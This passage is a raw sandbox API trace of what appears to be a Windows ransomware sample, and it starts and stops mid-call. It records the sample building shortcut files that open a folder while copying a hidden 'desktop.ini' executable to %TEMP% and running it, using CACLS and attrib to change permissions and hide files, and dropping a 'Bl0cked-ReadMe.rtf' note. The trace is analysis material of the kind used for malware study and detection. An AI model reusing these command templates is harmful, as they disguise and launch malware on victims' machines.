riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0146.804] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0146.804] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0146.804] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0146.806] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"Security\" & type \"Security\\desktop.ini\" > \"%TEMP%\\ZrRexJlz.exe\" && \"%TEMP%\\ZrRexJlz.exe\"") returned 0x0 [0146.806] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0146.806] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0146.806] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0146.806] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security.lnk", fRemember=0) returned 0x0 [0146.860] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0146.860] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0146.860] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0146.860] CoUninitialize () [0146.861] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0146.861] ReleaseMutex (hMutex=0xf8) returned 1 [0146.861] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0146.861] ReleaseMutex 
(hMutex=0xf8) returned 1 [0146.861] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0146.861] ReleaseMutex (hMutex=0xf8) returned 1 [0146.861] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0146.861] ReleaseMutex (hMutex=0xf8) returned 1 [0146.861] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.863] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png", lpFilePart=0x12eab4*="background.png") returned 0x66 [0146.863] GetLastError () returned 0x5 [0146.863] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0146.863] LocalFree (hMem=0x1c6cc8) returned 0x0 [0146.863] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". 
%s") returned 0x19 [0146.863] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0146.864] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0146.864] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0146.864] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0146.864] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0146.864] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png\"", lpProcessInformation=0x12fba4*(hProcess=0x110, hThread=0x114, dwProcessId=0xb10, dwThreadId=0xbdc)) returned 1 [0146.869] 
WaitForSingleObject (hHandle=0x110, dwMilliseconds=0xffffffff) returned 0x0 [0147.273] CloseHandle (hObject=0x110) returned 1 [0147.273] CloseHandle (hObject=0x114) returned 1 [0147.273] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0147.273] ReleaseMutex (hMutex=0xf8) returned 1 [0147.273] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0147.273] ReleaseMutex (hMutex=0xf8) returned 1 [0147.273] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0147.273] ReleaseMutex (hMutex=0xf8) returned 1 [0147.273] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0147.273] ReleaseMutex (hMutex=0xf8) returned 1 [0147.273] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0147.274] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png", lpFilePart=0x12eab4*="background.png") returned 0x66 [0147.274] GetLastError () returned 0x5 [0147.274] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0147.274] LocalFree (hMem=0x1c6cc8) returned 0x0 [0147.274] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, 
cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0147.274] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0147.274] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0147.274] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0147.274] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{113527A4-45D4-4B6F-B567-97838F1B04B0}\\") returned 0x58 [0147.274] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\", cchLength=0x39 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\10.0\\REPLICATE\\SECURITY\\") returned 0x39 [0147.274] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{113527A4-45D4-4B6F-B567-97838F1B04B0}\\", cchCount1=88, lpString2="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\10.0\\REPLICATE\\SECURITY\\", cchCount2=57) returned 3 [0147.274] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{113527A4-45D4-4B6F-B567-97838F1B04B0}\\") returned 0x58 [0147.274] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0147.274] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{113527A4-45D4-4B6F-B567-97838F1B04B0}\\", cchCount1=88, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 1 [0147.274] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, 
cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0147.275] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0147.275] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0147.275] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\") returned 0x34 [0147.276] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0147.276] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0147.276] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xbe0, dwThreadId=0xb24)) 
returned 1 [0147.281] CloseHandle (hObject=0x110) returned 1 [0147.281] CloseHandle (hObject=0x114) returned 1 [0147.281] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\bl0cked-readme.rtf")) returned 0xffffffff [0147.282] GetLastError () returned 0x2 [0147.282] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0147.296] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\bl0cked-readme.rtf")) returned 0x20 [0147.296] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0147.296] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0147.296] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0147.296] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0147.296] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: 
lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0147.297] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0147.297] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0147.297] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", lpszShortPath=0x123027c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\") returned 0x34 [0147.297] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0147.297] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0147.297] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpszShortPath=0x123003c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1") returned 0x33 [0147.298] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" & type 
\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x18a | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\ALLUSE~1\\MICROS~1\\DEVICE~1\\DEVICE\\{11352~1\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\ALLUSE~1\\MICROS~1\\DEVICE~1\\DEVICE\\{11352~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\ALLUSE~1\\MICROS~1\\DEVICE~1\\DEVICE\\{11352~1\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\ALLUSE~1\\MICROS~1\\DEVICE~1\\DEVICE\\{11352~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x18a [0147.298] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0147.298] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h 
\"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\"", lpProcessInformation=0x12fb78*(hProcess=0x114, hThread=0x110, dwProcessId=0xb74, dwThreadId=0xa5c)) returned 1 [0147.303] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0xffffffff) returned 0x0 [0147.930] CloseHandle (hObject=0x114) returned 1 [0147.930] CloseHandle (hObject=0x110) returned 1 [0147.930] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0147.930] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0147.930] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0147.930] GetTickCount () returned 0x2deca [0147.930] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=20471964299) returned 1 [0147.930] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="w\x1dﯸ\x12萀\x1d") returned 1 [0147.930] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="6\x1dﯸ\x12萀\x1d") returned 1 [0147.931] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="A\x1dﯸ\x12萀\x1d") returned 1 [0147.931] MultiByteToWideChar (in: 
CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="b\x1dﯸ\x12萀\x1d") returned 1 [0147.931] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="R\x1dﯸ\x12萀\x1d") returned 1 [0147.931] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="s\x1dﯸ\x12萀\x1d") returned 1 [0147.931] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="J\x1dﯸ\x12萀\x1d") returned 1 [0147.931] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="q\x1dﯸ\x12萀\x1d") returned 1 [0147.931] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0147.931] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0147.931] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0147.931] CharUpperBuffW (in: lpsz="explorer.exe \"{113527a4-45d4-4b6f-b567-97838f1b04b0}\" & type \"{113527a4-45d4-4b6f-b567-97838f1b04b0}\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x9d | out: lpsz="EXPLORER.EXE \"{113527A4-45D4-4B6F-B567-97838F1B04B0}\" & TYPE \"{113527A4-45D4-4B6F-B567-97838F1B04B0}\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x9d [0147.931] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") 
returned 0xa [0147.931] CharUpperBuffW (in: lpsz="explorer.exe \"{113527a4-45d4-4b6f-b567-97838f1b04b0}\" & type \"{113527a4-45d4-4b6f-b567-97838f1b04b0}\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x9e | out: lpsz="EXPLORER.EXE \"{113527A4-45D4-4B6F-B567-97838F1B04B0}\" & TYPE \"{113527A4-45D4-4B6F-B567-97838F1B04B0}\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x9e [0147.931] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0147.931] CoInitialize (pvReserved=0x0) returned 0x0 [0147.931] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0147.933] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0147.933] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0147.933] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0147.935] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe 